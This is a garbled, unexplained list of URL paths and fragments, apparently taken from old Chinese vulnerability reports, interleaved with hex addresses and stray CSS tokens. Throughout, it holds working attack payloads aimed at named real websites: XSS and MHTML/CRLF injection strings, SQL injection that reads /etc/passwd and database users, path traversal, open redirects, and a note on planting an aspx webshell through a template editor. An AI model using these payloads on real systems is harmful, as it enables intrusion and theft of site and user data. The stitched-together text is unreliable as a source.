10003D57 10003D5B 10003D5E 10003D61 10003D62 10003D64 10003D67 10003D68 10003D6A 10003D6D 10003D6E 10003D71 10003D76 10003D77 10003D78 10003D78 10003D78 10003D7A 10003D7A blog.chinaunix.net/space.php?domain=ydzhang /index.php?tag=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E 
http://www.douban.com/search?search_text=ax%250AContent-Type%253Amultipart%252frelated%253Bboundary%253Dx--x%250AContent-Location%253A80sec%250AContent-Transfer-Encoding%253Abase64%250d%250a%250d%250aPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4%252b%253D--!80sec /TR/html4/strict.dtd www.google.com/favicon.ico /support/bin/resource/all.css?v=261_7 /support/bin/request.py?contact_type=contact_policy%0dContent-Type%3Amultipart/related%3Bboundary%3Dx--x%0DContent-Location%3Ax%0DContent-Transfer-Encoding%3Abase64%0d%0dPHNjcmlwdD5hbGVydCgnZ21haWwgMGRheSB0ZXN0IGJ5ID8/PycpPC9zY3JpcHQ%2B%--x!x /love/love/previewImageAction.do?imagUrl=/../../../../../../../../../../../etc/passwd mhtml:http://tbskip.taobao.com/json/spu_price_trend.htm?callback=xx%0dx%250AContent-Type%253Amultipart%252frelated%253Bboundary%253Dx--x%250AContent-Location%253Asun%250AContent-Transfer-Encoding%253Abase64%250d%250a%250d%250aPHNjcmlwdD5hbGVydChsb2NhdGlvbi5ocmVmKTs8L3NjcmlwdD48YnI+DQoNCg0KDQo=%252b%253b--!sun mhtml:http://tbskip.taobao.com/json/spu_price_trend.htm?callback=xx%0dx%0AContent-Type%3Amultipart%2frelated%3Bboundary%3Dx--x%0AContent-Location%3Asun%0AContent-Transfer-Encoding%3Abase64%0d%0a%0d%0aPHNjcmlwdD5hbGVydChsb2NhdGlvbi5ocmVmKTs8L3NjcmlwdD48YnI+DQoNCg0KDQo=%2b%3b--!sun /cdo_web_servlet.cdo?strTransName=getBuyerDistrictDetail&$$CDORequest$$=%3CCDO%3E%3CSTRF%20N=%22strServiceName%22%20V=%22BuyerService%22/%3E%3CSTRF%20N=%22strTransName%22%20V=%22getBuyerDistrictDetail%22/%3E%3CLF%20N=%22lDistrictId%22%20V=%2210101%22/%3E%3C/CDO%3E /)在圈子内发帖时没有过滤输入的代码可导致提交任何危险代码 /product/phonedetail.aspx?phoneid=A0500000454 /boblog/boblog.txt]这个漏洞 /images/skin1/css.php.bak /%61%73%70%6E%65%74%5F%63%6C%69%65%6E%74/%61%6A%61%78%2E%6A%73 /info.php /admin.php /show.php/?id=17808 /show.php/?id=17808 /umodi.php?&tag=icon /main/adfclick?bid=1564,1201,202&cid=1254,1,1&db=afanie&show=ignore&sid=1196&url=http://wooyun.org /gaopeng/lp/gaopeng/register.php /gaopeng/lib/MySqlDb.inc.php5 /etc/passwd / /control/ /upload.aspx 
/serious-bug-of-sina-weibo/ /wow/achievement.php?id=878 /cwlk/achievement.php?id=284 /wow/zone.php?id=4273 /kdxy/itinfo.php?itid=11425 /wulin2/pzinfo.php?id=16384 /twow/itemset.php?id=143 /upload/ ?cmdID ?roomID ?gameid /?cmdID ?cmdID=2&www.wooyun.org /open_game.html?tencent://?cmdid=2&www.wooyun.org的网站。 /consultdetail.aspx?ID=83 /consultdetail.aspx?ID=83%20and%201=2%20union%20select%200,0,0,0,0,concat(char(94),char(94),char(94),load_file(0x633a5c626f6f742e696e69),char(94),char(94),char(94)),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20/*%20and%201=1 /mps/mps_shop/news_detail.jsp?newsID=24 /news.jsp?type=GY /news.jsp?type=GY /p_cs_outlet_shops_tc.jsp?mainDistrict=kl /p_cs_outlet_shops_tc.jsp?mainDistrict=kl%27%20union%20all%20select%20null,null%20from%20dual-- /p_cs_outlet_shops_tc.jsp?mainDistrict=kl'%20and%20 /search.php?keyword=%22%20onmouseover%3dprompt%28/hello_akast/%29%20bad%3d%22&kwtype=0&searchtype=titlekeyword /squirrel_zone/diaryDetail.php?picname=1%3C%2ftitle%3E1%3CScRiPt%20%3Eprompt%28/hello_akast/%29%3C%2fScRiPt%3E&picurl=05.jpg /sns/space.php?uid=83142&do=blog&id=5384 /squirrel_zone/cartoonDetail.php?picname=%B1%F9%BC%A4%C1%DC&picurl=%22%20onmouseover%3dprompt%28/hello_akast/%29%20bad%3d%22 /squirrel_zone/txDetail.php?picname=%C7%F5%B3%A4&picurl=%22%20onmouseover%3dprompt%28/HELLO_AKAST/%29%20bad%3d%22 /searchEx.do?p=[{"t":"high","name":"x","year":2012},{a:alert(document.domain)}]&s=0&ref=sg_findfriend_highschool_search /TR/html4/loose.dtd 10px small 1px normal 80% normal 1em 1px white top 2px 1px left normal 11px 1px right 5px monospace 100% hidden monospace pre 1px none 1em 30px monospace pre pointer black black none 120px none transparent relative bold /jon /queryip/ DBUtils-1.0-py2.6.egg/DBUtils/SteadyDB.py www.python.org /index.aspx?ajax=true&hospitalid=333373&doctorid=341314 /index.aspx?ajax=true&hospitalid=333373&doctorid=341314 
http://data.gz2010.sohu.com/event_type_json.php?callback=----%25C9%25F1%25C2%25ED%25B9%25B7%25C6%25A8%25B6%25AB%25CE%25F7%252A%252F%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary%253D_boundary_by_mere%250D%250A%250D%250A--_boundary_by_mere%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250ADQo8c2NyaXB0Pg0KYWxlcnQoJ2hlbGxvIHdvcmxkIScpOw0KPC9zY3JpcHQ%252BDQo%253D%250D%250A--_boundary_by_mere--%250D%250A%250D%250A!cookie /sitefiles/userfiles/1.asp /purchase/shoppingcart_pop.aspx?backurl=http://www.baidu.com/ /event_type_json.php?callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg www.xywy.com/mrss2/zxtj/20110011 void(0) /special/007525G0/urs-163.html?s=1#q=%20%3Cimg%20src=1%20onerror=alert%28/l4mp.org/%29%3E&start=0 /Apply/applysubmit.aspx?classid=46760 /upload/edit/ /34855/photos/ /api/album/create/ /album/23209/ /api/reply/add/ /api/reply/add/ /api/reply/add/ /api/reply/add/ /album/23198/?style=thumbnail /api/album/create/ /34855/albums/ /api/album/create/ /loginservice.aspx?callback=%3Cscript%3Ealert%28/seckeep.com/%29%3C/script%3E /lottery/ajax/get_present_friend_list.do?callBack=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg http://cgi.music.soso.com/fcgi-bin/fcg_search_xmldata.q?uin=&p=1&perpage=5&source=10&r=1300289076687&ie=utf-8&w=xxx%0Dxxxxxxxxx%0AContent-Type%3Amultipart%2frelated%3Bboundary%3Dx--x%0AContent-Location%3Asun%0AContent-Transfer-Encoding%3Abase64%0d%0a%0d%0aPHNjcmlwdD5hbGVydChsb2NhdGlvbi5ocmVmKTs8L3NjcmlwdD48YnI+DQoNCg0KDQo=%2b%3b--!sun /selfservice/toNewCreateBankCardInfo!photoView.action?pid=186 alert('XSS') /?p4p=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg 
/?p4p=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg /?p4p=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg /?p4p=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg /?p4p=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg mhtml:http://t.qq.com/search/index.php?k=xxxxxxxx%0Dxxxxxxxxxx%250AContent-Type%253Amultipart%252frelated%253Bboundary%253Dx--x%250AContent-Location%253Asun%250AContent-Transfer-Encoding%253Abase64%250d%250a%250d%250aPHNjcmlwdD4NCmFsZXJ0KC9iZWFzdGsvKTwvc2NyaXB0Pjxicj4NCg0KDQoNCg==%252b%253b--!sun mhtml:http://t.qq.com/search/index.php?k=xxxxxxxx%0Dxxxxxxxxxx%0AContent-Type%3Amultipart%2frelated%3Bboundary%3Dx--x%0AContent-Location%3Asun%0AContent-Transfer-Encoding%3Abase64%0d%0a%0d%0aPHNjcmlwdD4NCmFsZXJ0KC9iZWFzdGsvKTwvc2NyaXB0Pjxicj4NCg0KDQoNCg==%2b%3b--!sun http://t.qq.com/search/index.php?k=x%250AContent-Type%253Amultipart%252frelated%253Bboundary%253Dx--x%250AContent-Location%253A360sec%250AContent-Transfer-Encoding%253Abase64%250d%250a%250d%250aPHNjcmlwdD5hbGVydCgndGVzdGVkIGJ5IFFaJlJBeWg0YyYzNjAgc2VjIF9fX19fICAtIC0hJyk8L3NjcmlwdD4%252b%253D--!360sec /x.exe 00430C20 00430C21 00430C23 00430C26 00430C28 00430C2D 00430C33 00430C34 00430C3B /v/2jaoqR1Wirk/&snap_pic=http://localhost/include/xss.swf/v.swf /showdiary.php?id=15561'%20AnD%201=2%20UnIoN%20aLl%20SeLeCt%201,2,3,4,5,6,CoNcAt /searchResult.htm?Search=关键字 /main/adfclick?db=afanie&bid=36225,17584,334&cid=485,57,1&sid=35846&url= /main/c?d=qiyiafp-5&i=z356,95595,2767&u= /download/downpage/netarea/id/1600003/wapc/5000_0005_003 alert(1) 
/service/tenpay_jump.shtml?url=%68%74%74%70%3a%2f%2f%77%77%77%2e%35%31%37%33%2e%63%6f%6d /3gstock/search/notfound.php?word=%3Cscript%3Ealert%28%27pg5yl8%27%29%3C%2Fscript%3E /zzy/jsp/js/.svn/entries /ibmshowcase/view/249 /sinamall/assets/datagif/168fl/1.txt /sinamall/assets/datagif/168fl/1.txt /speaklist/ /DPS/,宽带账号点http://221.231.151.68/DPS/gotoQuan.jsp?wo=kd /Admin/FloatPostAdmin.aspx /link.php?url= /clk/request.s?d= /red/click.php?url=http://e.miaozhen.com/r.gif?%5Ek=A+30%5Eae=1085%5Eo= /r.gif?%5Ek=A+30%5Eae=1085%5Eo= /r.gif?%5Ek=A+30%5Eae=1085%5Eo=http://wooyun.org /limitBuy.aspx?callback= /detail.php?id=-1428+union+select+1,2/* /08active/413ainol/detail.php?id=-9021/**/union/**/select/**/load_file(0x2F6574632F706173737764),2,3,4/* /test1.php /bbs/attachment/Mon_1103/11_2212210_5f31437b04c3cc1.jpg /bbs/attachment/Mon_1103/11_2212210_5f31437b04c3cc1.jpg/88.php /admins/ /plain;base64,PGZ tmpFileType=lcase(up.getFileInfo(“filetype”)) /index.php?event_id=200%20and%201=2%20union%20select%201,version(),3,4,database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 10023EFF 10023F01 10023F03 10023F05 10023F09 10023F0A 10023F0D 10023F0F 10023F11 10023F16 10023F19 10023F1B 10023F20 10023F24 10023F25 http://tieba.baidu.com/tb/js/tbnet/wuque.swf?debugMode=1&onReady=alert%282%29 text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4= /tomcat-docs/appdev/sample/web/hello.jsp?test= /article.php?acid=3'%20and%20'1'='2 /tag/right.php?tagId=44&pId=4 /list.php?id=64839存在SQL注入 /v/pL8HIu4nKC4/&snap_pic=http://secsay.com/t.sina/t.swf/v.swf /qunba.php?ac=thread_qb&tid=17421 /1.txt /liveodds/marker_asia.php?m_id=440722 / /account/settings/binding?telephone=13800138000&checkCode=&isCancel=0 /baike/pic/item/7870145538a6b092b645ae33.jpg http://www.0x50sec.org /n/phpcms/2011/0331/2.html /n/phpcms/down.php?a_k=GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D /var/www$ 
/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKCTUhSktdZl5LQEhBSExCaXhtRkJKdWtZShY9E0ofBxwUFQhjZnNPD1AoNUQLB3oCWF8eWlcRCSV4LBsL /test/test/suc.php /cn/home/search/?q= /img/baidu_logo_jr_1005_jy.gif /cn/home/search/?q= /cn/home/search/?q= /mediawiki/skins/ /statistics?origin=61001&url=http://www.sina.com.cn alert('xss') /echtoo/player.php /c.php?id=30001831&l=%22%3E%3Cscript%3Ealert(88668066);%3C/script%3E /type/content.php?tid=1628&type=%22%3E%3Cscript%3Ealert(88668066);%3C/script%3E /stat.php?id=33222&web_id=33222&show=%22%3E%3Cscript%3Ealert(88668066);%3C/script%3E /?keyword=【XSS】&module=search&act=search /eleven/fendou/fendou_03.php?uid=3680&vid=XMTg2MTA2OTcy%27 /info/sale/ /contribute.php?catid=22 /2011/0405/366.html /magic_image.php?gd=1&fonttype=4&txt=ADcCAw9wKjtaOhNGAS0uPQorC14OOQY%3D / /v1/main.php?siteid=你的统计代码ID&s=ipsearch /ADPolestar/lgs/way/?http://www.nowpc.net /logincheck.jsp.bak /product_detail.jsp.bak /viewForum.jsp.bak /viewForum.jsp.bak /viewForum.jsp.bak /viewForum.jsp.bak /query?charset=gb2312&style=standard&database=user&exactitude=1&qt= /cmdn/supesite/newdev.controlpanel.php?usertype=personal&operation=apply /movie/search/movie_search?session=a6bb6525&q=%3Ciframe%20src%3Dhttp%3A%2f%2fwww.wooyun.org%20width%3D800%20height%3D600%20onmouseover%3Dalert%28%2fXSSed-By-xDo%2f%29%3E%3C%2fiframe%3E /pagemydns/authpage.php /login.php?burl=http://www.wooyun.org /v3/bbs/images/loading.gif /jsbug'});alert('xss')//',w:'auto',h:'auto /subject/phpinfo.php /subject/adodb/tests/ /mediawiki/images/ / / /publish/admin/config.php /search_mall.php /newsserver.asmx?op=Getnew /p/3g.163.com/sports/special/0005037G/nbaindex.html /p/3g.163.com/nba/data/match/report/2010/11910.html /ip_look.php?ip=[XSS /web1/news/ /bugs/wooyun-2010-01768的修复方案是寄托于tudou的修复 /owner/own_gift_notice.php /owner/own_gift_notice2.php /iask/wappage/j.php?url= /sinaurl.php?go=2&u= /story.php?id=7%20and%201=2%20union%20select%201,user(),@@version,4,database(),6,7 sales 4.0.26-log 
/account/settings.php在派送地址处的”收件人“,”街道地址处“均可成功插入跨站代码,图我就不截了,麻烦 C15DDF55-9AE3-490A-A6F5-E63020698D5C /adpolestar/wayl/;ad=B0992513_9B8E_3121_C2B1_9A0EC32FDEBD;ap=0;pu=san9;/?http://www.baidu.com /flash.html,其HTML代码如下: http://trusteddomain.com/wooyun.jpg!wooyun.swf String /flash.html Event ByteArray String /activity/list.aspx?CategoryName=Activity_2007'%20and%20'3'='3 /activity/list.aspx?CategoryName=Activity_2007'%20and%20'3'='4 /jsbug/ / /front/click?url=http://www.wooyun.org /showlist.aspx?words="%20onmouseover="alert(/xss/) /item.htm?id=9981436099 /addtopic.aspx?words=%22%20onmouseover=%22alert%28/xss/%29 /so.aspx?SearchWordUp= /search.aspx?ddlTable=zhaos&ddlCategory=%D5%D0%C9%CC_%CE%F7%D2%A9&ddlCategoryTwo=OTC%C0%E0&ddlFormula=%BC%C1%D0%CD_%C6%AC%BC%C1&searchtype=effect&searchtext=%22+onmouseover%3D%22alert(/xss/) /qunba.php?ac=thread_qb&tid=4440 /qunba.php?ac=thread_qb&tagid=657&tid=9547 /qunba.php?ac=thread_qb&tid=16173 /qunba.php?ac=thread_qb&tid=9136 /3g/pro/index.php?tid=254&did=1185&vid=2316&ch=gp&vt=3&wm=gwo%22%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E /team/myteamShow.php?other_uid=1300618620 /tx2/quests.php /aion/quests.php /tx2/quests.php /blog/index.jsp / /u/11767666/profile.html /CampusSite/howtodo.aspx?id=1 /soft/261/261407.html /234.gif / /news/more.php?area=zit /treasure/tr_info.php /manage&manage_id=5 /play&vid=2488 /tv/ipad/client//video.php?vid=242 /IdeaEDriver/driver.html 9E2CD2C3-4DDA-4473-B904-B8E6D0DBAB86 /doc/skins/ /homepage/announce_view.jsp?id=2217%27+or+1%3Dutl_inaddr.get_host_address%28%28%28select+distinct+chr%28126%29%7C%7Cchr%2839%29%7C%7Ccast%28table_name+as+char%2850%29%29%7C%7Cchr%2839%29%7C%7Cchr%28126%29+from+%28select+distinct+rownum+r%2Ctable_name+from+all_tables+where+owner /talk/view.php?tid=603 /identifyingCode/ /identifyingCode/ /wp-includes/ /wp-content/themes/default/images/ /wp-content/uploads/ /wp-content/plugins/google-analyticator/ /wp-content/uploads/ /search?keyword=da 
/servlet/JAS?action=jobSearch&keyword=%3Cscript%3Ealert%28/by%20vini5/%29%3C/script%3E /turbosearch/search.jsp%20 /turbosearch/search.jsp%2e /turbosearch/search.jsp.bak /v/search.php?page=1&search_type=search_videos&search_id=%22%3E%3Cscript%3Ealert(/j4nker/)%3C/script%3E&sort=title webvul@sohu.com /turbosearch/admin/ /mytianyaPhoto/PicList.asp?ownerId=9958505'&dirId=1577522 /v/search.php?page=1&search_type=search_videos&search_id=%22%3E%3Cscript%3Ealert(/j4nker/)%3C/script%3E&sort=title /2011/0429/suning/index.php就是这个地址 /dc.php /home.php?s=19 /yszs/expert_online.php?type=data&uid=5173376 /i/99395512 /details.php?id=54 /include/editor/filemanager/ /iplookup/include/editor/filemanager/ /zhuangxiu/rijiku-100----.html /test/ /test/testmeta.php /test/cpup.php /baidu2011/IndexPage.aspx存在高危FCK编辑器漏洞! /x1/2011/cn/)查看,您的验证码为:【5688】 /icons/ /phpinfo.php /htdocs/ /data/ /admin/ /admin/ /FCK/editor/filemanager/browser/default/connectors/test.html /php.php /admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default,写入aspx木马。 /tools/rss.aspx就可以了。 /admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default,写入aspx木马。 /tools/rss.aspx就可以了。 / /index/ /index/?province=110000 /about/ /about/privacy/ /feedback/ /mobile/ /merchants/ /account/referrals/ /account/signup/ /help/api/ www.xx.com/admin/Folder.aspx?noSelect=0&folder=/_skins/r&filter=*.htm其实除了filter这个外,folder也没做过滤,直接可以www.xx.com/admin/Folder.aspx?noSelect=0&folder=c:/windows/system32&filter=*.htm访问任意目录 /User/CommPages/FolderImageList.asp?CurrPath=/admin/ /User/CommPages/FolderImageList.asp?CurrPath=/123456/ /User/FileManage.asp?Type=FolderReName&OldFileName=../../123456&NewFileName=654321 /html/c68dcc7c-d336-8c03-7fd7-cdbd18f025ef.htm www.xx.com/admin/Folder.aspx?noSelect=0&folder=/_skins/r&filter=*.htm www.xx.com/admin/Folder.aspx?noSelect=0&folder=/_skins/r&filter=*.aspx /zhiqingadmin/?_a=manage&_c=tieba&_page=1 
/user/index.aspx?urls=http://www.XXX.com /user/index.aspx点击控制面板,修改资料,职业处存在存储型xss /user/index.aspx点击社区/讨论- /bbs/uc_server/admin.php?m=user&a=login&iframe=&sid='%22%3E%3Ciframe%20src=http://www.pker.in%3E /a/j/dm3/index.jsp?sid=XXXXXXXXXXXXXXXXXXXXX /cgi-bin/setting1?sid=eP6_czyZRqFmXFwR&fun=list&loc=frame_html,,,3 /paycenter/index/num/22201410%20a SELECT Unknown Errno:1054 MySQL SELECT Unknown Errno:1054 MySQL /infoxxx/upload/2011.php www.xxx.com www.xxx.com www.xxx.com.test.com /news_through/luyan.php?id=19%20and%201=2%20union%20select%201,user(),3,4,5,version(),7 / /upload/index.php /subscribe.php中对post数据中的跨站脚本过滤不严 www.xxx.com/UserCenter/main.aspx www.xxx.com/Template/T_xx00.aspx / /list.php?cid=131-1%20UNION%20SELECT%20concat%28username,0x3A,password%29,2,3,4,5%20from%20cms_admin-- /kb/834141/ /common/modules/mail/houseweek_more.php?id=-313+union+select+1,2,3,user(),5,6,version(),8,9,10,11,12,13,14,15,16 /cn/ZuanSou_Index.html?soho=1 /whitehats/XXX,本应该是http://wooyun.org/corps/XXX /dashan/show/guess?fun=alert&arg=haha /dashan/show/guess?fun=document.write&arg=haha qunar /ca_test.jcp?fromCity=&type=&callback=%3Cscript%3Ealert(1)%3C/script%3E&charset=gbk /lowerPrice.jcp?&callback=%3Cscript%3Ealert(1)%3C/script%3E /p/city?s=31#hello\ /biaobai/addBiaoBai?content=表白内容&beiId=表白对象ID号&beiName=表白对象名&userType=0 /biaobai/addPublic?beiId=表白对象ID /biaobai/addDoing?c=表白内容&type=2 /feedcommentreply.do?fin=15&ft=status&ff_id=状态主id&c=回复内容&owner=状态主id&requestToken=686920806&source=状态id&t=3,可以据此构造出一个链接,当别的用户点击这个链接时,就会在不知情的情况下在某条状态下回复攻击者指定的内容 /building_list.asp?id=28 /building_list.asp?id=28 
/58show.php?key5=%E4%BA%A4%E5%8F%8B%22%3E%3Cscript%20window.open(%22www.baidu.com%22)%3C/script%3E%3Ctextarea%20cols=100%20rows=111%3E%E8%BF%99%E6%A0%B7%E5%8F%8D%E5%A4%8D%E4%BA%86%E8%AE%B8%E5%A4%9A%E5%90%8E%E6%AC%A1%E5%90%8E%EF%BC%8C%E9%82%A3%E7%94%B7%E4%BA%BA%E5%BE%84%E8%87%AA%E8%B5%B7%E8%BA%AB%E8%B5%B0%E5%87%BA%E9%97%A8%E5%A4%96%E5%8E%BB%EF%BC%8C%E5%A5%B3%E4%BA%BA%E4%BC%B8%E5%A4%B4%E5%96%8A%E4%BA%86%E5%87%A0%E5%A3%B0%E4%BB%96%E4%B9%9F%E4%B8%8D%E7%90%86%E3%80%82%E7%AD%89%E6%88%91%E5%BF%AB%E5%90%83%E5%AE%8C%E6%97%B6%EF%BC%8C%E9%82%A3%E7%94%B7%E4%BA%BA%E5%9B%9E%E6%9D%A5%E4%BA%86%EF%BC%8C%E6%89%8B%E9%87%8C%E8%BF%98%E6%8A%93%E7%9D%80%E4%B8%80%E4%B8%AA%E6%96%B0%E8%80%83%E5%A5%BD%E7%9A%84%E7%BA%A2%E8%96%AF%EF%BC%8C%E8%BF%98%E5%86%92%E7%9D%80%E7%99%BD%E7%99%BD%E7%9A%84%E7%83%AD%E6%B0%94%E3%80%82%E4%BB%96%E7%A2%B0%E4%BA%86%E4%B8%80%E4%B8%8B%E5%A5%B3%E4%BA%BA%EF%BC%8C%E5%B0%B1%E5%B0%86%E7%83%AD%E4%B9%8E%E4%B9%8E%E7%9A%84%E7%BA%A2%E8%96%AF%E8%BF%9E%E7%9A%AE%E9%83%BD%E6%B2%A1%E5%89%A5%E5%BC%80%E5%B0%B1%E5%A1%9E%E5%88%B0%E5%A5%B3%E4%BA%BA%E6%89%8B%E9%87%8C%EF%BC%8C%E4%BD%8E%E5%A3%B0%E5%9C%B0%E8%AF%B4%EF%BC%9A%E2%80%9C%E5%90%83%E5%90%A7%EF%BC%81%E2%80%9D%E5%B8%A6%E7%9D%80%E6%B5%93%E5%8E%9A%E7%9A%84%E5%9C%B0%E6%96%B9%E5%8F%A3%E9%9F%B3%E3%80%82%E6%88%91%E7%9C%8B%E5%88%B0%E5%A5%B3%E4%BA%BA%E5%8F%91%E6%84%A3%E5%9C%B0%E7%9C%8B%E4%BA%86%E7%9C%8B%E8%87%AA%E5%B7%B1%E7%9A%84%E4%B8%88%E5%A4%AB%E4%B8%80%E4%B8%8B%EF%BC%8C%E8%84%B8%E4%B8%8A%E6%B5%AE%E7%8E%B0%E5%87%BA%E4%BA%86%E5%B9%B8%E7%A6%8F%E7%9A%84%E5%BE%AE%E7%AC%91%E3%80%82%E6%88%91%E7%8C%9C%E6%83%B3%EF%BC%8C%E5%A5%B9%E5%A4%A7%E6%A6%82%E6%98%AF%E6%83%8A%E8%AE%B6%E8%87%AA%E5%B7%B1%E7%9A%84%E4%B8%88%E5%A4%AB%E5%B9%B3%E6%97%B6%E4%B8%8D%E8%88%8D%E5%BE%97%E8%8A%B1%E9%92%B1%EF%BC%8C%E4%BD%86%E4%BB%8A%E5%A4%A9%E5%8D%B4%E8%8A%B1%E9%92%B1%E4%B8%BA%E8%87%AA%E5%B7%B1%E4%B9%B0%E5%90%83%E7%9A%84%E3%80%82%E7%84%B6%E5%90%8E%EF%BC%8C%E5%A5%B3%E4%BA%BA%E5%B0%B1%E5%BC%80%E5%A7%8B%E7%BB%86%E7%BB%86%E5%9C%B0%E3%80%81%E5%B0%8F%E5%BF%83%E5%9C%B0%E5%90%83%E5
%90%83%E7%9D%80%E3%80%82%E5%BD%93%E5%8F%AA%E5%89%A9%E4%B8%8B%E4%B8%80%E5%8D%8A%E5%90%8E%EF%BC%8C%E5%A5%B9%E5%BF%BD%E7%84%B6%E5%81%9C%E4%B8%8B%E6%9D%A5%EF%BC%8C%E6%8A%8A%E6%89%8B%E9%87%8C%E7%9A%84%E5%8D%8A%E5%9D%97%E7%BA%A2%E8%96%AF%E9%80%92%E5%88%B0%E4%B8%88%E5%A4%AB%E7%9A%84%E5%98%B4%E8%BE%B9%EF%BC%8C%E8%AF%B4%EF%BC%9A%E2%80%9C%E6%88%91%E5%90%83%E9%A5%B1%E4%BA%86%EF%BC%8C%E4%BD%A0%E5%90%83%E5%90%A7%EF%BC%81%E2%80%9D%E5%90%8C%E6%A0%B7%E5%B8%A6%E7%9D%80%E6%B5%93%E9%87%8D%E7%9A%84%E5%9C%B0%E6%96%B9%E5%8F%A3%E9%9F%B3%E3%80%82%E5%A5%B9%E4%B8%88%E5%A4%AB%E6%8E%A8%E5%BC%80%E8%AF%B4%EF%BC%9A%E2%80%9C%E6%88%91%E4%B8%8D%E5%90%83%E3%80%82%E2%80%9D%E8%99%BD%E7%84%B6%E9%82%A3%E7%94%B7%E4%BA%BA%E8%AF%B4%E4%B8%8D%E5%90%83%EF%BC%8C%E4%BD%86%E6%98%AF%E4%BB%96%E5%8D%B4%E6%82%84%E6%82%84%E5%9C%B0%E5%92%BD%E4%BA%86%E5%92%BD%E5%8F%A3%E6%B0%B4%EF%BC%8C%E5%9B%A0%E4%B8%BA%E6%88%91%E7%9C%8B%E5%88%B0%E4%BB%96%E7%9A%84%E5%96%89%E7%BB%93%E5%8A%A8%E4%BA%86%E5%8A%A8%E3%80%82%E4%B8%A4%E4%BA%BA%E6%8E%A8%E6%9D%A5%E6%8E%A8%E5%8E%BB%E5%A5%BD%E4%B8%80%E4%BC%9A%E5%84%BF%E5%90%8E%EF%BC%8C%E5%A5%B3%E4%BA%BA%E5%B0%B1%E5%BC%BA%E8%A1%8C%E5%B0%86%E7%BA%A2%E8%96%AF%E5%A1%9E%E5%88%B0%E7%94%B7%E4%BA%BA%E7%9A%84%E6%89%8B%E9%87%8C%EF%BC%8C%E5%A5%B3%E4%BA%BA%E7%9C%8B%E7%94%B7%E4%BA%BA%E5%90%83%E5%AE%8C%EF%BC%8C%E4%BE%BF%E7%9B%B8%E8%A7%86%E8%80%8C%E7%AC%91%EF%BC%8C%E7%84%B6%E5%90%8E%E5%8F%88%E9%9D%A0%E5%9C%A8%E4%B8%80%E8%B5%B7%E7%BC%A9%E7%9D%80%E5%9D%90%E7%9D%80%E3%80%82%E9%82%A3%E5%A5%B3%E4%BA%BA%E7%9C%8B%E5%88%B0%E6%88%91%E7%9C%8B%E4%BB%96%E4%BF%A9%EF%BC%8C%E5%8F%88%E5%BE%AE%E5%BE%AE%E7%9A%84%E7%AC%91%E4%BA%86%E7%AC%91&%3C/textarea%3E /index.php?app=newlist&pid=9 /ditu/ditu_traffic_page.php?city=&address=d%22/%3E%3Cscript%3Ealert%281%29%3C/script%3E /auth/login/?action=authByRTX /?_a=login /admin/login.jsp /auth/login /ifengepgwebM/CheckIn.aspx?ReturnUrl=%2fifengepgwebM%2fProgramEdit.aspx /ifengepgwebM/CheckIn.aspx?ReturnUrl=%2fifengepgwebM%2fProgramEdit.aspx / 
/view.php?chId=9152&docId=6644573&docName=http://www.wooyun.org.&docUrl=. /video/webinar_subject.php?webinar_id=502 /admin/login.php /u/yzs/358922.shtml www.iresearch.cn\project\DataProvider\SqlDataProvider.cs:934 www.iresearch.cn\project\DataProvider\SqlDataProvider.cs:902 www.iresearch.cn\project\DAL\sys_blog.cs:371 cs:253 /caseinfo.asp?Newid=209&cid=1 /db/login.php /zsjyc/viewnews.asp?id=1107 /old/aboutus.php /old/aboutus.php /?s=thread&bid=2235&tid=5841 /adsclick?seq=20110526000091&loc=Auto_CXK_Width1 /index_detail.php?iid=9262%22%3E%3Cscript%3Ealert%281%29%3C/script%3E%3C%22 /read.asp?id=2325 /data/account/ 